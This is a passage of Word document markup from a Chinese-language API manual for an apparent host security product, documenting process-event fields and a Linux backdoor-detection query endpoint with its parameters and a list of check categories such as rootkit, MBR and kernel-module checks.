            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06EE137E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F6CE6F1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0542F037" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentProcUserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74061444" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28446DF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="643A6621" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="151BEAC5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE4750D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentProcGroupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A6B7B31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0861F03B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3049AA6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C1B7705" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B0A52DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processTreeList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0619FD8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E2090BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325D9B4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程树,按顺序为父进程至子进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54ECB03A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B1CE6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44496D70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FF837DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0083A20E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AA77B05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="309" w:name="_Toc115166227"/>
      <w:bookmarkStart w:id="310" w:name="linux后门检测"/>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="308"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linux后门检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
    </w:p>
    <w:p w14:paraId="162754A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="_Toc115166228"/>
      <w:bookmarkStart w:id="312" w:name="查询结果-5"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w14:paraId="7DE71202" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux后门检测扫描结果的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AACF4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF0766" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/backdoor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="522BB2C3"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2359"/>
        <w:gridCol w:w="1074"/>
        <w:gridCol w:w="839"/>
        <w:gridCol w:w="5810"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="18A9EED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175D374" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503E0991" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7701E666" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EF0D862" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="148B75E6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A3D3DCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A7886B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CD4D885" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C834F71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A7C2EA4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4536B5D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EEB0FA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AC3B6D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4149E252" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="442CF9C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19163507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03FD1328" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED48F32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B862457" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6692DBCB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C76BE15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4266D1FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D92D71C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05534536" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>后门类型，包含： 应用后门，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bootkit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，Rootkit；恶意进程会返回对应检测库中的后门类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BAA4B99" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B06D6E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckNames</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="406F6C28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D950743" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294448D1" w14:textId="5E446B28" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查功能，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "linux后门检查功能" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>Linux后门检查功能</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F3CF4A9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2305FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DA8EFAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64FFD853" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="461ADA7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3082A58D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>Linux检查功能字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2641"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DDB8B8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F15E7DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="266CFABA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A849D0E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A85CC8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>RPM-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A055B18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="273F75CF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C8A0D28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>DPKG-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5727A706" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="721257E5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48975DDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>磁盘MBR检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71F8D50D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="594081D8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44C2D5EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>计划任务检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0195573D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2D933629" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC22EA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>动态链接库检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2683E920" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4286C0FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03918BF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基本命令检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B2C6F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08040C4F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A5FDDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>已知rootkit检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69088C87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BD22A39" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E58F071" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统内核模块检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550CEC4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D04C6CB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78AACE41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>网络状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
